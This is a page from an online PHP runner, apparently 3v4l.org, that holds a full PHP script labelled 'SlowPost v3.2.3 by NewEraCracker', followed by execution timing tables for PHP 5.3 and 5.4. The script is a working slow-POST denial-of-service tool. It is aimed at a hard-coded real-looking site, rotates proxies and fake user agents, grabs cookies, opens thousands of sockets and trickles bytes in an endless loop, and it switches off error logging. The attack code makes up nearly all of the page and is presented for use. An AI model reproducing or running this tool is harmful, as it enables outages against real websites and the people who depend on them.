3v4l.org

run code in 300+ PHP versions simultaneously
<?php $_SERVER['argv'][1] = 'http://www.bolsadelisboa.com.pt/'; //------------------------- // CONFiG //------------------------- $CONFIG['max_cookies'] = 20; $CONFIG['max_sockets'] = 9001; $CONFIG['timeout_ms'] = 500; //------------------------- // INiT //------------------------- // Check PHP Version if(version_compare(PHP_VERSION, '5.0.4') < 0) { exitWithError('This script only supports PHP 5.0.4 and higher.'); } // Define exploit version if(!defined('EXPLOIT_VERSION')) { define('EXPLOIT_VERSION', 'v3.2.3'); } // Define input stream if(!defined('STDIN')) { define('STDIN', fopen('php://stdin', 'r')); } // Globals - DO NOT EDIT $global_proxy_array = array(); //------------------------- // FUNCTIONS //------------------------- /** Read STDIN and return it */ function readSTDIN($message) { echo PHP_EOL.$message.' : '; return trim(fgets(STDIN)); } /** Exit with error message */ function exitWithError($message) { echo '[ERROR] '.$message; exit(1); } /** Receive a filename that has proxies listed in it and fills the $global_proxy_array */ function proxyLoadFile($filename) { global $global_proxy_array; // Load proxy list file $filename = str_replace('\\', '/', $filename); $content = @file_get_contents($filename); if(!$content) { exitWithError($filename.' is not a valid proxy-list file!'); } $content = str_replace(array("\r\n", "\r"), "\n", $content); $content = explode("\n", $content); // Grab the proxies foreach($content as $value) { $tmp = explode(':', $value); if(isset($tmp[0], $tmp[1])) { $tmp[0] = trim($tmp[0]); $tmp[1] = (int)(trim($tmp[1])); $global_proxy_array[] = array('host' => $tmp[0], 'port' => $tmp[1]); } } } /** Returns a random a proxy */ function proxyGetRandom() { global $global_proxy_array; $proxy = false; if(count($global_proxy_array)) { while(!$proxy) { $rand = mt_rand(0, count($global_proxy_array) - 1); $proxy = (isset($global_proxy_array[$rand]) ? $global_proxy_array[$rand] : null); } } return $proxy; } /** Returns a random useragent */ function randomUserAgent() { // Random Windows version $os = array('5.1', '5.2', '6.0', '6.1', '6.2'); $os = $os[mt_rand(0, count($os) - 1)]; // Select a random browser if(mt_rand(0, 1)) { // Random Internet Explorer version $ua = array(array('4.0', '8.0', '4.0'), array('5.0', '9.0', '5.0'), array('5.0', '10.0', '6.0')); $ua = $ua[mt_rand(0, count($ua) - 1)]; return "Mozilla/{$ua[0]} (compatible; MSIE {$ua[1]}; Windows NT {$os}; Trident/{$ua[2]})"; } else { // Random Mozilla Firefox version $ua = mt_rand(17, 21); return "Mozilla/5.0 (Windows NT {$os}; rv:{$ua}.0) Gecko/20100101 Firefox/{$ua}.0"; } } /** Build stream context or header for connection */ function buildStreamContext($newEraUrl, $newEraProxy, $method='GET', $length='0', $cookie='', $just_header=false) { // Proxy support $proxy = $newEraProxy ? $newEraProxy->full_url : ''; $fulluri = ($newEraProxy && !$newEraUrl->ssl) ? true : false; // Prepare for header build $header = ''; // When we return header, set the GET/POST line if($just_header) $header .= $method.' '.($fulluri ? $newEraUrl->full_url : $newEraUrl->path).' HTTP/1.1'."\r\n"; // Continue building the header $header .= 'Host: '.$newEraUrl->name."\r\n"; $header .= 'Connection: Keep-Alive'."\r\n"; $header .= 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n"; $header .= 'User-Agent: '.randomUserAgent()."\r\n"; $header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n"; $header .= 'Accept-Encoding: gzip,deflate'."\r\n"; $header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n"; if($method == 'POST') { $header .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n"; $header .= mt_rand(0, 1) ? 'Referer: '.$newEraUrl->full_url."\r\n" : ''; $header .= ($cookie ? "Cookie: {$cookie}\r\n" : ''); $header .= "Content-Length: {$length}\r\n"; } // When we return header, return it with an extra EOL for termination if($just_header) return $header."\r\n"; // Build stream context $context = stream_context_create(array( 'http' => array( 'method' => $method, 'timeout' => (2), 'header' => $header, 'proxy' => $proxy, 'request_fulluri' => $fulluri, 'max_redirects' => (0), 'protocol_version' => (1.1), 'ignore_errors' => true ), 'ssl' => array( 'verify_peer' => false ))); return $context; } /** Start slowPost */ function slowPostStart($newEraUrl, $newEraProxy, $cookie) { global $CONFIG; $obj = ($newEraProxy ? $newEraProxy : $newEraUrl); $host = ($obj->ssl ? 'ssl://' : 'tcp://').$obj->name; // Connect if($socket = @fsockopen($host, $obj->port, $errno, $errstr, 2)) { // Generate random Content-Length $length = mt_rand(1337, 133700); if($newEraProxy && $newEraUrl->ssl) { // We must enable crypto when using a proxy and url with ssl $header = 'CONNECT '.$newEraUrl->name.':'.$newEraUrl->port."\r\n"; $header .= 'Host: '.$newEraUrl->name.':'.$newEraUrl->port."\r\n"; $header .= 'Proxy-Connection: Keep-Alive'."\r\n\r\n"; @fwrite($socket, $header); do { $s = trim(@fread($socket, 8192)); } while($s); @stream_socket_enable_crypto($socket, true, STREAM_CRYPTO_METHOD_SSLv3_CLIENT); } // Send header if(@fwrite($socket, buildStreamContext($newEraUrl, $newEraProxy, 'POST', $length, $cookie, true))) { // Set the socket to be asynchronous stream_set_blocking($socket, 0); stream_set_timeout($socket, 0, $CONFIG['timeout_ms']); // Return socket and the length remaining return array('socket' => $socket, 'length' => $length); } } return false; } /** Continue slowPost */ function slowPostContinue($socket, $bytes = 5) { // Check socket if(!$socket) return false; // Do it $tmp = ''; for($j = 0; $j < $bytes; $j++) $tmp .= chr(mt_rand(ord('a'), ord('z'))); return @fwrite($socket, $tmp); } //------------------------- // CLASSES //------------------------- /** I want cookies! Give me cookies! */ class NewEraCookies { private $max_cookies; private $cookies = array(); /** Constructor */ public function __construct($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) { $this->update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile, $output); } /** Object updater */ public function update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) { $this->max_cookies = $max_cookies; $this->cookies = array(); if($output) echo PHP_EOL.'BUILDING COOKIES '; for($i = 0; $i < $this->max_cookies; $i++) { // Using Proxy file? if($proxyFile) { $newproxy = proxyGetRandom(); if(!$newproxy) { exitWithError($proxyFile.' is not a valid proxy-list file!'); } $newEraProxy->update_object($newproxy['host'].':'.$newproxy['port']); } $this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraProxy); if($output) echo '.'; } } /** Returns a cookie by its index */ public function returnCookieByIndex($idx) { if($idx == 'random') $idx = mt_rand(0, $this->max_cookies - 1); if(isset($this->cookies[$idx])) return $this->cookies[$idx]; return ''; } /** Function to parse set-cookie from header fields */ public static function cookieParse($header) { $cookies = array(); foreach($header as $line) { if(preg_match('/^Set-Cookie: /i', $line)) { $line = preg_replace('/^Set-Cookie: /i', '', trim($line)); $csplit = explode(';', $line); $cdata = array(); $grabbed_cookie_data = false; foreach($csplit as $data) { $cinfo = explode('=', $data); $cinfo[0] = trim($cinfo[0]); if(!$grabbed_cookie_data) { $cdata['value']['key'] = $cinfo[0]; $cdata['value']['value'] = $cinfo[1]; $grabbed_cookie_data = true; continue; } $cinfo[0] = strtolower($cinfo[0]); if($cinfo[0] == 'expires') $cinfo[1] = @strtotime($cinfo[1]); if($cinfo[0] == 'secure') $cinfo[1] = 'true'; if(in_array($cinfo[0], array('domain', 'expires', 'path', 'secure', 'comment'))) { $cdata[$cinfo[0]] = $cinfo[1]; } } $cookies[] = $cdata; } } return $cookies; } /** Function to build the request cookie header from parsed set-cookie data */ public static function cookieBuild($data) { if(is_array($data)) { $cookie = array(); foreach($data as $d) $cookie[] = $d['value']['key'].'='.$d['value']['value']; if(count($cookie) > 0) return trim(implode('; ', $cookie)); } return false; } /** Function to grab cookies from an url using PHP's fopen */ public static function cookieGrab($newEraUrl, $newEraProxy = null) { $cookie = ''; $handle = @fopen($newEraUrl->full_url, 'r', false, buildStreamContext($newEraUrl, $newEraProxy, 'GET')); // I hope this does work if($handle) { // Grab the cookies $metadata = stream_get_meta_data($handle); $cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data'])); @fclose($handle); } return $cookie; } } /** Class to construct and handle an url-like object */ class NewEraUrl { private $host_full_url; private $host_protocol; private $host_ssl; private $host_name; private $host_port; private $host_path; /** Constructor */ public function __construct($url) { $this->update_object($url); } /** Object updater */ public function update_object($url) { $this->host_full_url = $url; // URL: SSL and protocol $this->host_ssl = (strpos($url, 'https') === 0) ? true : false; $this->host_protocol = ($this->host_ssl ? 'https' : 'http'); $url = explode('/', $url, 4); $url[2] = explode(':', $url[2], 2); // URL: Name, port and path $this->host_name = $url[2][0]; $this->host_port = (isset($url[2][1]) ? $url[2][1] : ($this->host_ssl ? 443 : 80)); $this->host_path = '/'.(isset($url[3]) ? $url[3] : ''); } /** Getter for the private properties */ public function __get($var) { $var = 'host_'.$var; if(isset($this->{$var})) { // Random support $str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $str = substr(str_shuffle($str), 0, 8); // Return string with random generated content return str_replace('%rand%', $str, $this->{$var}); } } /** Quick check to see if url is minimally valid */ public static function isValid($url) { if(strpos($url, 'https://') === 0) { if(!extension_loaded('openssl')) { exitWithError('OpenSSL extension is not loaded - Unable to access HTTPS URL.'); } return true; } else if(strpos($url, 'http://') === 0) { return true; } return false; } } /** Class to construct and handle a proxy-like object */ class NewEraProxy { private $proxy_full_url; private $proxy_name; private $proxy_port; /** Constructor */ public function __construct($url) { $this->update_object($url); } /** Object updater */ public function update_object($url) { if(FALSE !== ($tmp = strpos($url, '://'))) { $tmp += 3; $url = substr($url, $tmp); } $url = explode(':', $url); // Proxy: Name, port and full URL $this->proxy_name = $url[0]; $this->proxy_port = (int)(isset($url[1]) ? $url[1] : '8080'); $this->proxy_full_url = 'tcp://'.$this->proxy_name.':'.$this->proxy_port; } /** Getter for the private properties */ public function __get($var) { $var = 'proxy_'.$var; if(isset($this->{$var})) return $this->{$var}; } } //------------------------- // MAiN CODE FOR THE LULZ //------------------------- // Check SAPI if(PHP_SAPI != 'cli') { header('Content-Type: text/plain'); if(!isset($_SERVER['argv'][1]) || !NewEraUrl::isValid($_SERVER['argv'][1])) { exitWithError('This script is not meant to be ran via browser.'); } } echo " _______. __ ______ ____ __ ____ / || | / __ \ \ \ / \ / / | (----`| | | | | | \ \/ \/ / \ \ | | | | | | \ / .----) | | `----.| `--' | \ /\ / |_______/ |_______| \______/ \__/ \__/ .______ ______ _______.___________. | _ \ / __ \ / | | | |_) | | | | | | (----`---| |----` | ___/ | | | | \ \ | | | | | `--' | .----) | | | | _| \______/ |_______/ |__| ".PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL; // We seem to be running this in a quite good fashion @set_time_limit(0); @ini_set('error_log',''); @ini_set('log_errors',0); @ignore_user_abort(true); // Fetch the URL to attack $url = null; if(isset($_SERVER['argv'][1]) && NewEraUrl::isValid($_SERVER['argv'][1])) $url = $_SERVER['argv'][1]; // Fetch proxy to use $proxy = array(); if(!empty($url) && isset($_SERVER['argv'][2])) { if($proxy = explode(':', $_SERVER['argv'][2])) { if(isset($proxy[0], $proxy[1])) { $proxy = array('file' => false, 'host' => $proxy[0], 'port' => (int)$proxy[1]); } } if((empty($proxy['host']) || empty($proxy['port'])) && is_readable($_SERVER['argv'][2])) { $proxy = array('file' => true, 'filename' => $_SERVER['argv'][2]); } } // Ask for proxy if(empty($url) && (empty($proxy['host']) || empty($proxy['port'])) && empty($proxy['file'])) { do { switch($tmp = strtolower(substr(readSTDIN('Do you want to use a proxy [yes/no/file]'), 0, 1))) { case 'n': break; case 'y': $proxy['host'] = readSTDIN('Proxy IP'); $proxy['port'] = (int)(readSTDIN('Proxy port')); break; case 'f': $proxy['filename'] = readSTDIN('Proxy file'); if(is_readable($proxy['filename'])) { $proxy['file'] = true; } else { echo PHP_EOL.'Invalid file!'.PHP_EOL; $tmp = null; } break; default: echo PHP_EOL.'Invalid choice!'.PHP_EOL; $tmp = null; break; } } while(!$tmp); } // Ask for target URL while(!$url) { $url = readSTDIN('Target url'); if(NewEraUrl::isValid($url)) break; $url = null; echo PHP_EOL.'Invalid target!'.PHP_EOL; } // Init proxy support if(empty($proxy['host']) || empty($proxy['port'])) { $newEraProxy = null; if(!empty($proxy['file'])) { proxyLoadFile($proxy['filename']); $newproxy = proxyGetRandom(); if(!$newproxy) { exitWithError($proxy['filename'].' is not a valid proxy-list file!'); } $newEraProxy = new NewEraProxy($newproxy['host'].':'.$newproxy['port']); } } else { $newEraProxy = new NewEraProxy($proxy['host'].':'.$proxy['port']); } // Init the others $newEraUrl = new NewEraUrl($url); $newEraCookies = new NewEraCookies($newEraUrl, $newEraProxy, $CONFIG['max_cookies'], @$proxy['file'], true); // Start echo PHP_EOL.'IMMA FIRIN MAH LAZOR '; $conn = array(); // Do it while(1) { for($i = 0; $i < $CONFIG['max_sockets']; $i++) { // Using Proxy file? if(!empty($proxy['file'])) { $newproxy = proxyGetRandom(); if(!$newproxy) { exitWithError($proxy['filename'].' is not a valid proxy-list file!'); } $newEraProxy->update_object($newproxy['host'].':'.$newproxy['port']); } // Open a new socket if($tmp = slowPostStart($newEraUrl, $newEraProxy, $newEraCookies->returnCookieByIndex('random'))) { if(isset($conn[$i], $conn[$i]['socket'])) { // Close an opened connection @fclose($conn[$i]['socket']); unset($conn[$i]); } // Save the new connection $conn[$i] = $tmp; // Progress bar echo '.'; } // Check the current slowPosts foreach($conn as $k => $v) { if($conn[$k]['socket'] && ($conn[$k]['length'] > 0)) { // Contine current $tmp = ($conn[$k]['length'] < 5) ? $conn[$k]['length'] : 5; slowPostContinue($conn[$k]['socket'], $tmp); $conn[$k]['length'] -= $tmp; } else { // Close completed @fclose($conn[$k]['socket']); unset($conn[$k]); } } } } ?>

Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).

VersionSystem time (s)User time (s)Memory (MiB)
5.4.171.7670.71719.90
5.4.161.9100.57019.74
5.4.151.7730.70719.81
5.4.141.8000.68317.16
5.4.131.7630.71717.08
5.4.121.8330.64717.21
5.4.111.7530.72717.29
5.4.101.8000.68017.28
5.4.91.7970.68717.17
5.4.81.8130.66317.27
5.4.71.7500.73017.32
5.4.61.8170.66317.27
5.4.51.7670.71717.23
5.4.41.8130.66717.27
5.4.31.8330.64717.09
5.4.21.7400.74317.31
5.4.11.8230.66017.10
5.4.01.8270.65316.61
5.3.261.8030.67715.14
5.3.251.7170.76715.11
5.3.241.7370.74715.02
5.3.231.7800.70015.10
5.3.221.7500.73015.07
5.3.211.8030.67715.24
5.3.201.8730.60715.21
5.3.191.7570.72015.09
5.3.181.7930.68315.08
5.3.171.7670.71315.05
5.3.161.7800.70015.19
5.3.151.8470.63315.07
5.3.141.7930.68714.99
5.3.131.7230.76015.18
5.3.121.7670.71315.16
5.3.111.7230.75715.04
5.3.101.7630.71714.55
5.3.91.7270.75314.53
5.3.81.6970.78714.53
5.3.71.8070.67714.55
5.3.61.7330.74714.57
5.3.51.8070.67314.50
5.3.41.8100.67014.36
5.3.31.8630.61714.63
5.3.21.8100.67314.30
5.3.11.8630.61714.21
5.3.01.8000.68014.14
preferences:
1557.52 ms | 1394 KiB | 21 Q